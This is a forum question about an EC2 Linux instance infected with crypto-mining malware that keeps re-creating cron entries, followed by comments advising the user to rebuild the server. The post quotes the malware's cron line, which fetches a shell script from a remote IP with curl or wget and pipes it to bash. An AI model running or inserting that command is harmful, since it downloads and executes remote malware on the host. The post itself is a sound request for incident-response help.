1

From last few days, I have noticed that applications running on my EC2 Linux instance are very slow. Running top command showed me that there is a process /var/tmp/sustse using most of the CPU.

I killed that process. However, after rebooting the instance, it again started running and utilizing most of the CPU. It is also making cron entries for following script:

*/30 * * * *    (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh

I googled and found that this is a crypto mining malware. I have removed its traces from /var/tmp/ and removed the entries in Crontab. however, these entries in Crontab seems to be coming back from somewhere and I couldn't trace the exact location of the script that's making these entries.

I have also cleaned up /var/spool/cron* entries.

I did not find any much information online to fix this issue. Any help here would be much appreciated.

Thanks in advance!!

Nikhil_CV
  • 536
  • 3
  • 15
Povam
  • 11
  • 1
  • Possible duplicate of : https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server – Nikhil_CV May 24 '19 at 09:32
  • 2
    Throw instance away, make changes to properly secure your system, create new instance. Attempts to trace down where the malware hides are just not worth the effort on a VM. – dirkt May 24 '19 at 09:32
  • There are so many applications and tools installed on this server. Though, we are using it as a dev box, its going to be a tedious task to migrate all the applications to a new server. And most concerning is we could not identify how this malware got installed on our server. If the server has been affected while downloading or installing some softwares (like docker images), then we may end up migrating the malware too to new server. – Povam May 27 '19 at 06:10

0 Answers0